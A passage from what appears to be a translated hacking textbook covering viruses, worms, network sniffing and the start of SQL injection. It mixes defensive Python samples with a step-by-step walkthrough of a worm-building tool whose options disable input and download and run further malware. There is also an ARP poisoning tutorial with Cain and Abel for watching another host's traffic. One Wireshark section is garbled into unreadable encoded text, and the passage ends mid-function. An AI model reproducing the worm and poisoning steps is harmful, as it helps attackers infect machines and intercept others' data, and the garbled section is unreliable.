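            if tail and digest(tail) == entry["sha256"]:
                report["prepended"].append(rel)
            else:
                report["modified"].append(rel)
    report["missing"] = [rel for rel in baseline if rel not in seen]
    return {kind: sorted(paths) for kind, paths in report.items()}


def demo() -> dict:
    """Build a constructed directory, take a baseline, change four files, verify."""
    with tempfile.TemporaryDirectory() as root:
        originals = {
            "app.exe": b"MZ constructed original program bytes",
            "report.doc": b"quarterly figures",
            "helper.dll": b"MZ constructed library bytes",
        }
        for name, data in originals.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        baseline = build_baseline(root)

        # Constructed changes standing in for what an infection might leave behind.
        with open(os.path.join(root, "app.exe"), "wb") as fh:
            fh.write(b"INSERTED-CODE-PLACEHOLDER" + originals["app.exe"])
        with open(os.path.join(root, "report.doc"), "wb") as fh:
            fh.write(b"quarterly figures (edited)")
        os.remove(os.path.join(root, "helper.dll"))
        with open(os.path.join(root, "dropped.tmp"), "wb") as fh:
            fh.write(b"unexpected file")
        return verify(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:10s} {paths}")
```

Files reported as prepended or modified are the ones to replace from known-good media, as the paragraph above advises.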
Some viruses are destructive, but others are not, so people tend not to care as long as no data has been damaged, and even when they learn of an infection they reinstall Windows rather than clean it out. This is not really good practice. Reinstalling is easy because Windows can be used pirated, but taking care and protecting in advance, before anything happens, is better.

Some companies and shops I have seen use network software, in a server and client arrangement. Sales systems such as iStock are used in the same way. In that situation the security of the OS is extremely important. Because the accounts are kept on computers, any data damage can lead to losses.
Anti-virus software uses a technique called signatures. The word "signature" is slightly misleading; "search string" would actually be more appropriate. But since we have all come to accept "signature", let us keep saying it. In reality, viruses do not have a specific signature that marks them as viruses.

When anti-virus software finds a file it assumes is infected, it still has to use other methods to confirm whether the file really is infected. If a sequence of bytes has changed, it marks the file as a virus. However, some such files are not viruses.

Virus signatures also differ from file to file, even for the same infection. That is because viruses work to make it hard for anti-virus software to recognize them all.

Another method viruses use to evade detection is encryption. Viruses encrypt their body. Because the virus encrypts each infected file with a different key, this is complicated and anti-virus software cannot decrypt it. It can only flag the file so that it is included in the next check. Decrypting the files is not possible for it. Since the encryption used is symmetric and the encryption key remains on the machine in clear text, we can decrypt and analyze the virus.
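The two paragraphs above, search-string signatures and per-file keys, as an added Python example (not code from the book). The marker, the file layout (ENC1, one clear-text key byte, encoded body) and the single-byte XOR standing in for the symmetric cipher are all constructed assumptions; the samples contain no executable code.

```python
MARKER = b"CONSTRUCTED-SEARCH-STRING-0001"  # benign, made-up "signature"
HEADER = b"ENC1"                            # constructed layout: HEADER, key byte, body


def xor(data: bytes, key: int) -> bytes:
    """Single-byte XOR, a stand-in for the symmetric cipher the text mentions."""
    return bytes(b ^ key for b in data)


def build_sample(key: int) -> bytes:
    """Constructed test file: harmless host bytes, then the encoded body.
    The key is stored in clear text next to the body, as the text describes."""
    body = b"body-start|" + MARKER + b"|body-end"
    return b"harmless host file contents\n" + HEADER + bytes([key]) + xor(body, key)


def scan_plain(data: bytes) -> bool:
    """Classic search-string scan: look for the marker bytes as they are."""
    return MARKER in data


def scan_with_stored_key(data: bytes) -> bool:
    """Analyst's approach: read the clear-text key, decode the body, then scan."""
    pos = data.find(HEADER)
    key_at = pos + len(HEADER)
    if pos < 0 or key_at >= len(data):
        return False
    return MARKER in xor(data[key_at + 1:], data[key_at])


def recover_key(data: bytes):
    """Without knowing the layout: try every single-byte key against the marker.
    Returns the key under which the marker appears, or None."""
    for key in range(1, 256):
        if xor(MARKER, key) in data:
            return key
    return None


def demo() -> list:
    """Scan two samples that carry the same body under different keys."""
    rows = []
    for key in (0x5A, 0xC3):
        sample = build_sample(key)
        rows.append({
            "key": key,
            "plain_scan_hit": scan_plain(sample),
            "decoded_scan_hit": scan_with_stored_key(sample),
            "recovered_key": recover_key(sample),
        })
    return rows


if __name__ == "__main__":
    for row in demo():
        print(row)
    # The encoded marker differs per key, so no single search string covers both files.
    print(xor(MARKER, 0x5A) != xor(MARKER, 0xC3))
```

The plain scan misses both samples because each key produces different bytes, while decoding with the stored key exposes the same marker in both.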
Covering everything about viruses would fill a book on this one topic alone, so only a brief selection of what is worth knowing has been discussed here.

Worms
A worm can be described as a type of software that multiplies easily across a network without any action by the user. Worms do not harm the data or applications on the computers they enter at all. However, because they consume resources, they do affect the network.

Hackers usually use worms together with Trojans. Worms take advantage of weak security, and outdated systems are easier to break into and infect. The worm's strength is how easily it spreads. Let us try building a worm in practice.

Worm Creating
Since we are not yet students of programming, we will create one using a tool. There is one tool for creating worms that I like, called Internet Worm Maker Thing. It can be downloaded from bit.ly/iwmt-kmn. (As usual, the applications in this book can also be found at bit.ly/kmn-app.)

When opened, it looks like the picture above. The window is large, so it will be clearer if you open it yourself.

In Worm Name, give any name that suits you. As usual I named it test. For Author I put tester, and for version I entered 1.0.
Name field: set to test.

Author field: tester.

Version: 1.0.

Here you can write the message you want displayed.

The location where the resulting file will be saved.

The ways it should spread can be chosen from these Spreading Options.

In the section below, just tick according to your needs.

Here a date can be entered if it should act on a set date.

I will leave this as it is.

If ticked here, drives no longer appear.
Disables Task Manager.
Makes the keyboard stop working.
Makes the mouse unusable.
Tick Message Box and write what you want displayed.
Enter the title here.

Enter the description here.

Choose the icon.

These can be disabled too if desired.

This field can be filled in only after ticking Change Reg Owner.

This works like the one above.

The home page can be pointed to the URL you want it changed to.

Choose whichever of these functions suits you.

Treating this as a worm aimed at myself, I removed only the ones that are dangerous for me. Let the rest stay. :)

If Open Web page is selected, the web pages you specify will keep opening by themselves.

Text to replace Internet Explorer's title bar can be entered.

The Windows Media Player text can be changed too if desired. I do not demonstrate anything here.

Download File can make the victim machine automatically fetch the software and other malware you want it to run. If there is more than one file, click More?.

In the box that appears after clicking More, direct links to the other malware or apps to add can be entered. Ticking Execute File makes them install (run) once the download finishes. These parts are easy to understand, so they are not explained at length. When everything is done, click Generate Worm. It will report that the worm was created successfully.

Now, looking in the location where it was saved, there is a .vbs file with the name we gave. Do not absent-mindedly open it with a double click; you would be caught by your own skill.

There is a great deal more to discuss about worms, but let me conclude here. Details will be written up further on my site, khitminnyo.com.

By now I trust you know at least a little about viruses and worms. We have discussed how they work, that what they do depends directly on their creator, how easily they can be created, and so on. As for prevention, it is the same as discussed in the previous chapter, so it is not repeated. Let us end this chapter here.
CHAPTER 21: Sniffers

Introduction

Most of us will be more or less familiar with the term packet analyzer. It goes by various names, such as packet analyzer, network analyzer, protocol analyzer, Ethernet analyzer or wireless analyzer, but they are all the same thing. When people say packet analyzer, most think only of a kind of software. In fact a packet analyzer can be a computer program (software), and it can also be a piece of hardware that can log and intercept the traffic passing over a digital network.

As data streams cross the network, sniffers can capture each packet. If needed, they can also decode the packets' raw data. On wired broadcast LANs, depending on the network structure (hub or switch), traffic on all the other machines can be captured from a single machine on the network.

On wired broadcast and wireless LANs, besides the unicast traffic sent to the machine running the sniffer software, there is multicast traffic sent to the multicast groups that machine is listening on, and broadcast traffic. To capture traffic, the network adapter used must be in promiscuous mode. Some adapters do not support promiscuous mode. Moreover, on a wireless LAN, even with the adapter in promiscuous mode, packets can still be ignored; to see them, the adapter needs to be in monitor mode.

When traffic is captured, either the entire content of each packet can be recorded, or only the headers instead of the whole content. Recording only the headers reduces storage requirements and also avoids legal problems. But we still need to keep enough data to find the information needed for problem diagnosis.
Just as the operating systems we use differ, sniffers also differ according to the OS they run on. Sniffer capabilities vary from one to another depending on the maker. In general, sniffers can:
❖ Analyze network problems
❖ Detect network intrusion attempts
❖ Detect network misuse by internal and external users
❖ Document regulatory compliance through logging all perimeter and endpoint traffic
❖ Gain information for effecting a network intrusion
❖ Monitor WAN bandwidth utilization
❖ Monitor network usage (including internal and external users and systems)
❖ Monitor data-in-motion
❖ Monitor WAN and endpoint security status
❖ Gather and report network statistics
❖ Filter suspect content from network traffic
❖ Serve as a primary data source for day-to-day network monitoring and management
❖ Spy on other network users and collect sensitive information, such as login details or users' cookies (depending on any content encryption methods that may be in use)
❖ Reverse engineer proprietary protocols used over the network
❖ Debug client/server communications
❖ Debug network protocol implementations
❖ Verify adds, moves, and changes
❖ Verify internal control system effectiveness (firewalls, access control, web filter, spam filter, proxy), and so on.
In the field of computer network administration, packet capture (pcap) comprises an application programming interface (API) for capturing network traffic. Unix-like systems implement pcap in the libpcap library, while Windows uses a port of libpcap called WinPcap.

Monitoring software uses libpcap or WinPcap, depending on the OS, to capture the packets crossing the network. In later versions, libpcap and WinPcap are also used to transmit packets on a network at the link layer and to obtain a list of the network interfaces that can be used.
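What "recording only the headers" looks like in the classic pcap file format that libpcap writes, as an added Python example (not code from the book). It builds a small capture twice, once with a 54-byte snap length and once in full, and parses both with the standard library only. The addresses, ports and payloads are constructed, and checksums are left at zero.

```python
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4
SNAPLEN = 54  # Ethernet 14 + IPv4 20 + TCP 20 bytes: headers only, no payload


def build_frame(src_ip, dst_ip, sport, dport, payload: bytes) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame (checksums left at zero)."""
    eth = bytes.fromhex("020000000002") + bytes.fromhex("020000000001") + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 0, 0x50, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_capture(frames, snaplen: int) -> bytes:
    """Write a classic pcap file, keeping at most snaplen bytes of each frame."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, snaplen, 1)  # linktype 1 = Ethernet
    for i, frame in enumerate(frames):
        kept = frame[:snaplen]
        out += struct.pack("<IIII", 1700000000 + i, 0, len(kept), len(frame)) + kept
    return out


def decode_headers(data: bytes, orig_len: int) -> dict:
    """Decode Ethernet, IPv4 and TCP headers from whatever bytes were stored."""
    rec = {"captured": len(data), "on_wire": orig_len, "payload_stored": 0}
    if len(data) < 34 or struct.unpack_from("!H", data, 12)[0] != 0x0800:
        return rec
    ihl = (data[14] & 0x0F) * 4
    rec["src"] = socket.inet_ntoa(data[26:30])
    rec["dst"] = socket.inet_ntoa(data[30:34])
    l4 = 14 + ihl
    if data[23] == 6 and len(data) >= l4 + 20:
        rec["sport"], rec["dport"] = struct.unpack_from("!HH", data, l4)
        doff = (data[l4 + 12] >> 4) * 4
        total_len = struct.unpack_from("!H", data, 16)[0]
        rec["payload_on_wire"] = total_len - ihl - doff
        rec["payload_stored"] = max(0, len(data) - (l4 + doff))
    return rec


def parse_capture(blob: bytes):
    """Return (snaplen, records) for a classic pcap file of either byte order."""
    magic = struct.unpack_from("<I", blob, 0)[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    fields = struct.unpack_from(endian + "IHHiIII", blob, 0)
    snaplen, linktype = fields[5], fields[6]
    if linktype != 1:
        raise ValueError("only Ethernet captures are handled here")
    offset, records = 24, []
    while offset + 16 <= len(blob):
        _sec, _usec, incl_len, orig_len = struct.unpack_from(endian + "IIII", blob, offset)
        offset += 16
        data = blob[offset:offset + incl_len]
        if len(data) < incl_len:
            raise ValueError("truncated record")
        offset += incl_len
        records.append(decode_headers(data, orig_len))
    return snaplen, records


def demo():
    """Same two constructed frames captured headers-only and in full."""
    frames = [build_frame("192.0.2.10", "192.0.2.20", 40000, 21, b"USER alice\r\n"),
              build_frame("192.0.2.10", "192.0.2.20", 40000, 21, b"PASS constructed-secret\r\n")]
    return build_capture(frames, SNAPLEN), build_capture(frames, 65535)


if __name__ == "__main__":
    for label, blob in zip(("headers only", "full content"), demo()):
        snaplen, records = parse_capture(blob)
        print(label, len(blob), "bytes, snaplen", snaplen)
        for rec in records:
            print("  ", rec)
```

The headers-only file still shows who talked to whom, on which ports, and how much data was sent, which is usually enough for diagnosis, while the payload bytes never reach the disk.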

WireShark
WireShark onf network analysis tool wpfck jzpfjyD;awmh Ethereal vdkY
todrsm;Muygw,f/ olu real time rSm packet awGudkzrf;,lay;EdkifjyD;
human-readable format tjzpf azmfjyay;Edkifygw,f/ WireShark rSm filter awG?
color-coding awGeJY network xJudk ydkjyD; eufeuf&dIif;&Idif; 0ifa&mufEdkifapjyD;
individual packet awGudk inspect vkyfay;Edkifr,fh feature awG yg0ifygw,f/
WireShark onf packet awGudk capture vkyfEdkifzdkYtwGuf pcap udk
toHk;jyKxm;jyD; CNU/Linux, OS X, BSD, Solaris eJY tjcm;aom Unix-like
Operating System awGtjyif Microsoft Windows rSmyg toHk;jyKEdkifzdkY zefwD;xm;
ygw,f/ uRefawmfwdkY toHk;jyKr,fh Kali Linux rSmawmh toifh yg&SdjyD;jzpfygw,f/
WireShark rSm TShark vdkYac:wJh (GUI version r[kwfwJh) terminal-based
version wpfrsdK;vnf; &Sdygao;w,f/ Kali Linux rSm TShark vnf; yg0ifjyD;om;
jzpfygw,f/

'guawmh uRefawmf vuf&SdoHk;aewJh interface udk azmfjywmyg/


uRefawmfu ck eth0 eJY oHk;aeygw,f/ wifi r[kwfvdkY wlan0 rjyxm;ygbl;/
vufawGYawG vkyfaqmifwJhtcg ydkjyD; jrifomapvdkwJhtwGufjzpfygw,f/

WireShark zGifhvdkufwJhtcg txufygyHktwdkif; wlan0 interface udk


awGY&rSmyg/ rdrdu wifi oHk;ae&ifawmh wlan ay:ygr,f/ uJ
qufvdkuf&atmifcifAs/

When WireShark is opened, as in the figure above, clicking the gear icon at the place marked with the arrow brings up Capture Interfaces, and at the place marked with the second arrow you will see that Promiscuous mode is enabled. As explained earlier, if the box is not ticked yet, tick it.

Once promiscuous mode has been enabled as shown above, press Start to begin.

If you are using wifi you will see what is shown in the figure above. After enabling promiscuous mode you can start, and if you want to reuse a setup where it is already enabled, you can also start by clicking the blue shark-fin icon in the Options bar.

After starting you have to wait a moment. You will then see the capture begin.

As in the figure above, you will see a great deal: which sources are using the internet, which devices are connected, and so on.

Looking at the figure, you can see not only the connections in use but also where each source comes from. In this example I am using a Xiaomi phone as a wifi hotspot. The Protocol column shows the protocols in use, such as TCP, UDP, SSDP and so on, and if you look to the right of the Length column, the Info column also shows the router's IP address.

When you select the entries one by one, you will see the detailed information shown above.

Type the link above into a browser to read the documentation on how to use WireShark. wiki.wireshark.org documents Wireshark usage in detail.

If we poison a network and enable promiscuous mode in order to sniff, all the traffic from the other computers on the network can be captured on our interface. Wireshark is a tool that is capable of this.

TCPdump
Another common packet analyzer is TCPdump. It is a command line interface tool that works with packets both transmitted and received on the network our computer is attached to.

In the Terminal you can listen with tcpdump or with tcpdump -vv. It is easier to understand if you try it yourself, so I will not print the results here.

To stop, press Ctrl + C. At the bottom you can see figures such as the number of packets captured. To begin with, when you run tcpdump (or tcpdump -vv), it captures all packets for all interfaces.

The figure above shows tcpdump -D being used to list all interfaces. The network interface I am using now is wifi, so it is wlan0; it is shown selected. That means we do not have to select every interface and can choose wlan0 alone. Because we are choosing an interface, we use -i.

As in the figure above, I chose wlan0 as the interface. (If you use Ethernet, you can choose eth0.)

As the next step, let's write the captured packets to a file so that they can be used again later. I used the write option (-w). I named the output file capture2.pcap. I changed the name because a file called capture.pcap already exists on my machine. You can give it any name you like, but it does need to end in .pcap. The number that follows greater at the end is the number of bytes.

As shown above, you can also do this using the destination (dst) host IP. Here I have shown it with a host IP and port 22. I hope you will also be able to look up tcpdump using the man and help options.

Sniffing : Passive Vs Active Sniffing


Passive sniffing is carried out in situations where many computers are connected through a hub.

I have drawn it this way to make it clear. The idea is that the devices on the network are connected by sharing a single hub.

Where machines are connected through a hub like this, passive sniffing is possible. Because the computers are on the same hub, all traffic has to be sent to all ports. In this situation, all an attacker has to do is start a sniffer and wait for some user in the same collision domain to send or receive data. A collision domain is the logical area of a network in which one or more data packets can collide with one another. All traffic in the collision domain is visible to the hub, and sniffing carried out in that situation is called passive sniffing.

When traffic has to be injected into the LAN to make sniffing possible, it is called active sniffing. The methods used include ARP spoofing, MAC flooding and MAC duplicating. Sniffing inside a switched network can be defined as active sniffing.

So that the attacker can sniff all the traffic in the network, traffic is made to go to all ports. In such switched networks, the ARP table maps IP addresses to MAC addresses. The switches keep their own ARP caches in content-addressable memory (CAM) and record which host is connected to which port. This is how some switches usually work. Even so, this has not been enough to prevent sniffing.

The way to sniff in a switched network of this kind is to change the switch's behaviour into that of a hub. In other words, the switch's direct output has to be turned into a broadcast method. One way of doing this is to foil (confuse) the switch by flooding the network with a very large number of frames. When that happens, the switches can no longer perform IP to MAC mapping and fail out into broadcasting.

Switched network attacks can be carried out at OSI model layer 2 or layer 3. (They are discussed further later on.) The layer 2 attacks are switch table flooding, ARP cache poisoning and MAC spoofing, while the layer 3 attacks include DNS poisoning, source routing, advertising bogus routes, initiating ICMP redirect messages and using rogue DHCP servers.

Techniques for Poisoning the Network


When an attacker starts generating frames from a host, pairing each source with a different MAC address, it causes forwarding table exhaustion on the network. Once the forwarding table is saturated it cannot learn any more entries, so other traffic is flooded as well. In this way the switch starts to behave like a hub, and the attacker can capture all the traffic destined for the ports and hosts on that network.

An attack of this kind can be detected by inspecting the switch forwarding table. Macof is a tool that can send tens of thousands of Ethernet frames in order to carry out such an attack.

The ARP protocol is intended to map IP addresses to NIC MAC addresses. That information is used to direct the traffic sent from one host to another.

In Windows cmd you can type arp -a to view this information. You can clear the ARP cache with arp -d. Clearing it can also resolve some network issues. arp can be used in our Kali Linux as well.

ARP spoofing is a technique in which an attacker creates fake (spoofed) Address Resolution Protocol (ARP) messages and sends them onto a local area network.

In the figure above you can see the attacker sending A's IP address combined with the attacker's own MAC address. As a result, any traffic coming back for A arrives at the attacker instead.

What can an attacker do with ARP spoofing? With ARP spoofing an attacker can intercept data frames on the LAN, modify them, or stop the traffic altogether. Attacks of this kind are commonly used as an opening for DoS attacks, man-in-the-middle attacks and session hijacking attacks.

ARP Poisoning
I will use Cain and Abel to show what can be done with ARP poisoning.

Open Cain and Abel and go to the Sniffer tab. If you click the plus icon, you may see what is shown below.

When it is opened for the first time you will see a message box like the one above, saying that the sniffer has to be activated. If you try to start from the place marked with the arrow, you will only see the Warning box.

Look at the line marked with the arrow in the WARNING message box. It tells you to run netsh int ip set global taskoffload=disable. Open the command prompt with run as administrator, type that line into cmd and press Enter.

Once it looks like the figure above, you can close the window. Close Cain and Abel and open it again. When it reopens, go back into Sniffer as before and start sniffing.

After starting you will have to wait a moment.

For now I am using two machines in VMware, Windows 7 and Windows 8.1, so I will discuss this using just these two. The machines in the network have been found, so I will stop sniffing. You stop it from the same place where you started it. Then let's look at the bottom of the Cain window.

Since we are going to do ARP poisoning, we go into ARP Poison Routing (APR). It is to the right of Hosts and has a round yellow icon. Click ARP Poison Routing (APR). Then click the plus sign and add the machines that are in our network.

The machine on which I am running Cain and Abel is 172.168.3.2. So choose the machine you want to watch, not your own machine. I am on a network with only two computers, so I selected the other one and clicked OK.

It now looks like the figure above.

As soon as you click the APR logo with Start poisoning in the upper left corner, you will see the status change to Poisoning, as in the figure above.

When the browser on the computer I am watching goes to www.google.com, you will see the Cain and Abel window change as shown. google.com is only an illustration. Whatever site is visited, it will be displayed in this way.

On the computer I am watching, accounts such as Google, Facebook and Microsoft were opened in the browser. Afterwards, looking from the attacking machine (the machine running Cain and Abel), you will see what is shown below.

The IP address at the front (172.16.3.128) is the IP of the computer I am watching, and the IP addresses at the end are the IP addresses of the websites that machine visited.

Looking at the sections in the left-hand pane, the entries with numbers beside them show what has been captured, and when APR is selected as in the figure you will see Certificate file, SSL Server, Port and Hostname. The port is 443, which tells you HTTPS is in use, and the Hostname column shows the websites that were visited. In the figure you can see that the computer I am watching is using, or has used, www.google.com, accounts.google.com, facebook.com and mail.live.com.

Into the network that contained only these two machines, Windows 7 (the machine running Cain and Abel) and Windows 8.1 (the machine being watched), I also connected a Kali Linux computer. (I used virtual machines for all three. If you do not have other machines, you can try this with VMs.)

It is just as in the figure above. I opened Wireshark and typed arp into Apply a display filter, because we are doing ARP poison routing. Then, under interface, you have to choose the current network interface that you want to watch. I am using VMs, so I used eth0. After that you can press Start. You will see results like those below.

MAC Spoofing
MAC spoofing can be defined as a technique for changing the factory-assigned Media Access Control address (MAC address). In fact, the MAC address is hard-coded in the Network Interface Controller and cannot be changed. However, we have tools that can make the operating system believe that the NIC has the address we have changed it to. That process of masking the MAC address is called MAC spoofing.

DNS spoofing
This is also called DNS cache poisoning. DNS spoofing is a kind of computer-hacking attack in which incorrect data is introduced, by whatever means, into the cache database of a Domain Name System (DNS) name server. This causes the name server to return incorrect IP addresses, which can divert traffic to the attacker's computer.

Sniffing and Spoofing Tools


Cain and Abel, which we have just used, can perform ARP poisoning and is easy to use. Another tool that can poison is Ettercap, which is included in our Kali Linux. It switches the network interface into promiscuous mode and can ARP poison target machines. It can carry out man-in-the-middle attacks and hit victims with a variety of attacks. It also supports plugins, so its features can be extended by adding plugins.

In our Kali Linux it comes in two forms, Ettercap and ettercap-graphical. Whichever one you open, it is the same. It can also be used from the command line. For now, let's open the graphical one.

The current version is ettercap 0.8.2. By the time you read this there may well have been a version update. When you open ettercap, what you see is File, Sniff, Options and Info.

Under Options you will see that Promiscuous mode is selected by default. You can also select Unoffensive. After that you are ready to sniff. Under Sniff there are Unified Sniffing and Bridged Sniffing. Unified sniffing is a method that can sniff all the packets passing over the cable. It works on one network interface only, so if you want to operate on two network interfaces you can use Bridged sniffing.

Once sniffing has started, you will see ettercap's options change.

Plugins can be added and managed, and connections can be watched from View.

Targets can also be chosen from Targets >> Select Target(s). Ettercap can work in four operation modes. IP-based filters packets based on source and destination IP. MAC-based filters packets based on MAC address and is very useful for sniffing connections that go through a gateway. ARP-based uses ARP poisoning to sniff between two hosts on a switched LAN, the kind most widely used today (full-duplex). Public ARP-based uses ARP poisoning to sniff the packets going from a victim host to all other hosts (half-duplex).

Dsniff, which is included in Kali Linux, is a tool that combines password sniffing and network traffic analysis tools. It is widely used because it is a sniffer that can handle the FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL protocols.

Sniffing is not limited to email or web sessions. Sniffers such as Cain and Abel can even intercept VoIP communication. VoIP stands for Voice over IP, and conversations carried over the network can be captured. The conversations between the caller and the responder can be saved as mono or stereo WAV files.
Sniffing, ARP poisoning, MiTM and DNS attacks are effective attacks, and with unprotected protocols they are not always easy to detect. Switch to protected protocols: use SSH instead of Telnet and HTTPS instead of HTTP. Systems should not be allowed to be exposed directly to the internet. A VPN should be used to protect every device on the network. As applications, XArp and ARPwatch should be used for protection. If possible, IDS or IPS hardware should be used to protect our workplace. Deploying IPSec also makes the data that hackers obtain by sniffing unusable to them.

Newer switches come with many security features. Port security helps to restrict the MAC addresses allowed on each port, and when an attack occurs the port can be shut down.

XArp is available in two editions, Free and Commercial. It can be obtained from www.xarp.net.
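An added example (not from the book and not XArp's or ARPwatch's own code): a Python sketch of the kind of check an ARP-monitoring tool performs. It parses raw Ethernet/ARP frames and raises an alert when an IP address moves to a different MAC or when one MAC starts answering for several IPs; the frames, the MAC addresses and the 172.16.3.1 and 172.16.3.2 addresses are constructed sample data.

```python
import struct
from collections import defaultdict

ETHERTYPE_ARP = 0x0806


def _mac(text):
    return bytes.fromhex(text.replace(":", ""))


def _ip(text):
    return bytes(int(part) for part in text.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet + ARP reply frame in memory (sample input only)."""
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)  # Ethernet/IPv4, opcode 2 = reply
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (sender_ip, sender_mac) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42:  # 14-byte Ethernet header + 28-byte ARP body
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, _op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return sender_ip, sender_mac


class ArpMonitor:
    """Tracks IP-to-MAC bindings seen in ARP traffic and records anomalies."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return
        ip, mac = parsed
        known = self.ip_to_mac.get(ip)
        if known is None:
            self.ip_to_mac[ip] = mac
        elif known != mac:
            # Keep the first-seen binding so repeated poison frames keep alerting.
            self.alerts.append(("binding-changed", ip, f"{known} -> {mac}"))
        ips = self.mac_to_ips[mac]
        if ip not in ips:
            ips.add(ip)
            if len(ips) > 1:
                self.alerts.append(("mac-claims-many", mac, ",".join(sorted(ips))))


# Constructed sample hosts: (MAC, IP). Only 172.16.3.128 appears in the book.
GATEWAY = ("00:50:56:aa:00:01", "172.16.3.1")
VICTIM = ("00:50:56:aa:00:80", "172.16.3.128")
ATTACKER = ("00:50:56:aa:00:02", "172.16.3.2")

SAMPLE_FRAMES = [
    build_arp_reply(*GATEWAY, *VICTIM),                # legitimate
    build_arp_reply(*VICTIM, *GATEWAY),                # legitimate
    build_arp_reply(*ATTACKER, *GATEWAY),              # legitimate
    build_arp_reply(ATTACKER[0], GATEWAY[1], *VICTIM),  # gateway IP, attacker MAC
    build_arp_reply(ATTACKER[0], VICTIM[1], *GATEWAY),  # victim IP, attacker MAC
    b"\x00" * 20,                                      # truncated frame, ignored
]


def run_sample():
    monitor = ArpMonitor()
    for frame in SAMPLE_FRAMES:
        monitor.observe(frame)
    return monitor.alerts


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

On a live network the first-seen binding is not necessarily the legitimate one, so a real deployment would seed the table from static or DHCP records.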

If an attack of this kind occurs, the computer being watched will show warnings like these. The switches and routers in use also need to be configured properly. Covering everything there is to say about sniffing would take a separate book, so I will stop here. See you again in the next chapter.
CHAPTER 22: SQL Injection

Introduction

A term we come across again and again is SQL injection. It can be carried out on any OS (on a computer or on a phone) with nothing more than a browser, which makes it a convenient attack to use, and SQL injection is also one of the most widely used common attack types.

Any security breach is mainly aimed at obtaining sensitive information and access by illegitimate means. This chapter discusses SQL injection at some length. Sensitive information means things such as social security numbers, credit card details, financial information, and user IDs and passwords. Once a SQL injection succeeds, the attacker can steal the data in the victim's database, alter and change information, create new entries, or delete entries. If a web application has a SQL vulnerability, its chances of being attacked with SQL injection are high.

Attackers submit SQL commands in order to gain unauthorized access through the SQL server and to retrieve database information. A SQL vulnerability is caused by a weakness on the part of the web developer, not by a weakness in the SQL server. SQL vulnerabilities arise from the web developer's inadvertent mistakes, from mistakes made knowingly, from mistakes due to lack of skill, and so on.

SQL stands for Structured Query Language and is used to communicate with a database. SQL can also be described as the standard language for relational database management systems. Because SQL injection is a code injection technique, there are some things we need to keep in mind about how it is used.
There are characters that hackers commonly use for SQL injection. To mention a few, they use single-line and multi-line comments, string indicators such as OR, concatenation characters, wildcard/asterisk parameters, URL parameters, local and global variables, time delays and so on.

In SQL injection there are three main attack types: 1. First Order Attack, 2. Second Order Attack and 3. Lateral Injection Attack. Speaking as a programmer, we need to deal with these characters in advance, from the moment we start building our programs. Attackers understand authentication mechanisms very well. That is why they tend to use sophisticated evasion techniques to bypass user authentication.

Attackers also use hex coding. On some websites you will see %20 in the URLs. That is hex coding; %20 stands for a space. Most alphanumeric characters, that is, characters made up of letters and digits, use hex coding. However, intrusion detection systems are not capable of recognising hex coding. Attackers therefore take advantage of this weakness and use hex coding to carry out their attacks.

The signature-based SQL injection detection engines in use today can recognise attacks such as white space encoding and changed numbers in malicious SQL code. However, they are not yet able to resolve such code and white space, and they also cannot recognise other text that contains no spaces. Attackers typically strip the white space out of their queries.

Without changing how the SQL statement executes, they obfuscate it to confuse protective systems by inserting extra white space between SQL keywords and strings (or numbers). If white space is inserted using special characters such as Tab or carriage return/linefeed, the statement that will be executed is not broken, and the detection systems can be fooled.
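An added example (not from the book): a detection-side Python sketch of why a signature check has to normalize input before matching. It decodes percent-encoding repeatedly, strips SQL block comments and collapses Tab/CR/LF runs, then applies three illustrative signatures; the rule names, the signatures and the sample request strings are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Illustrative signatures, applied to the normalized text only.
SIGNATURES = {
    "tautology": re.compile(r"\bor\s+(\d+)\s*=\s*\1\b"),
    "order-by-probe": re.compile(r"\border\s+by\s+\d+"),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
}


def naive_detect(raw):
    """Literal substring match on the raw request: what encoding defeats."""
    lowered = raw.lower()
    return any(sig in lowered for sig in (" or 1=1", "order by", "union select"))


def normalize(raw, max_rounds=3):
    """Undo the encodings described above before any signature is applied."""
    text = raw
    for _ in range(max_rounds):          # bounded, handles double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # block comments as spacing
    return re.sub(r"\s+", " ", text).lower()            # Tab/CR/LF runs -> one space


def detect(raw):
    """Return the sorted names of the signatures that match after normalization."""
    text = normalize(raw)
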